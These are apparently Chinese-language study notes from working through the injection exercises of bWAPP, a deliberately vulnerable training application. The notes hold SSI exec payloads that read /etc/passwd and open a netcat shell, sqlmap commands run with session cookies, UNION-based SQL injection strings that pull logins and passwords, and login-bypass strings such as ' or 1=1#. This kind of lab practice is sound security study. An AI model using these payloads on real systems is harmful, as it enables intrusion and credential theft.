0x01 A1 - Injection(第二次)
<!--#exec cmd="id" -->
<!--#exec cmd="cat /etc/passwd"-->
结果:
补充:<!--#exec cmd="nc -lvp 8888 -e bin/bash" -->
直接用SQLMAP可以跑出来
C:\Python27\sqlmap>
sqlmap.py -u http://10.93.1.46/bWAPP/sqli_1.php?title=abb&act
ion=
search --cookie "PHPSESSID=80cfc277961f5a0a812100ab0c5e620a;
security_level=0"
C:\Python27\sqlmap>sqlmap.py -u "http://10.93.1.46/bWAPP/sqli_1.php?title=abb&ac
tion=search" --cookie "PHPSESSID=80cfc277961f5a0a812100ab0c5e620a; security_leve
l=0" --dbs
问题参数:title
先输入’,发现有错
输入a,出现正常
输入a' or 1=1#,与a输入的内容一致
输入a' or 1=2#,出现查不到内容,证明有注入
补充:
输入a' union select 1,2,3,4,5,6,7 #&action=search
输入a' union select 1,user(),@@version,4,5,6,7 #&action=search
输入a' union select 1,login,password,email,5,6,7
from users#&action=search
漏洞参数:movie
点击GO出现原始URL:
192.168.0.128/bWAPP/sqli_2.php?movie=1&action=go
192.168.0.128/bWAPP/sqli_2.php?movie=1‘&action=go
http://192.168.0.128/bWAPP/sqli_2.php?movie=11%20union%20select%201,2,3,4,5,6,7#&action=go
(这边为什么需要让MOVIE参数出错之后才能显示结果)
http://192.168.0.128/bWAPP/sqli_2.php?movie=11%20union%20select%201,login,password,email,5,6,7%20from%20users#&action=go
出现密码
与GET一样
与GET类似
用burp抓包
Caphcha:验证码
万能密码登陆
用户名输入' or 1=1#
密码为空
直接绕过登陆界面
输入:'=' 'or'
直接绕过
一个新页面
一个新页面